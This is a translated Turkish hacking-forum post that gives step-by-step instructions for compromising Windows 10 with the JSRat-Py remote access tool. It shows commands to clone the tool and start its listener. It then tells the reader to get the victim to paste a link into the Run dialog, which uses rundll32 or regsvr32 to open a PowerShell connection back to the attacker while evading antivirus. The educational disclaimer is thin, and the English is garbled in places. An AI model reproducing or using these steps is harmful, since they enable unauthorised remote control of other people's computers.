How can I infiltrate to Windows 10?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Kullanıcı1233

Kıdemli Üye
19 Tem 2011
DrGaOs.png

My purpose of this demonstration is inform institutions and persons. To prevent major damage in cyberspace. My purporse on this writing is education.
I'm and Türk Hack Team are not responsible for your damages and taken damages.

Z51a6V.png

iX5ixb.gif

Z51a6V.png

--Lets infiltrate on the Windows 10 with JSRat--

As evident from the title nicked by "Hood3dRob1n" github user's thanks this rat tool as "JSRat-Py" give us methods with ‎Rundll32 or regsvr 32
İ showed how can you infiltrate.

--LİNUX PROCESS--

1) Download the necessary file.

Code:
git clone https://github.com/Hood3dRob1n/JSRat-Py

fCDbqT.png

2) Lets go to the named file.

Code:
cd JSRat-Py

3) With this code we will find main machine domain's host. We gonna want all adress with -l parameter. Shortly we want Linux's ip adress. We can learn this with ipconfig.

Code:
hostname -I

4) Lets run our software.

Code:
./JSRat.py -i <ip adress(hostname)> -p <bağlantı kurucağınız port>

6yexGk.png

5) The Links We Can Make Connection

gdvsK2.png

-WİNDOWS 10 PROCESS-

1) Lets make a look our system's ip adress.

Ixsyxc.png

2) Open the one of them the links given to us with the browser.

bj0BSf.png

3) Copy the writing on the marked area. Go to the Windows > Searchs > Run and click enter. Paste it here the link we copied. Click it "Okey" button.

6Zmrpc.png

-RESULT-

Because of the it is one of the best software is this software using programme ‎Rundll32 or regsvr32. Result of this it's making powershell connection.
You can also make it this with Powershell encryption method. You should do copy paste to Window's Run. As a result We made contact without the antivirus.
You will see this when you try to look our machine ip adress with ipconfig.

jyspL7.png

-------------------------------------------------------------------

Source: https://www.turkhackteam.org/siber-...dows-10-isletim-sistemine-sizalim-pourla.html

Translator: Xowly

Son düzenleme:
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.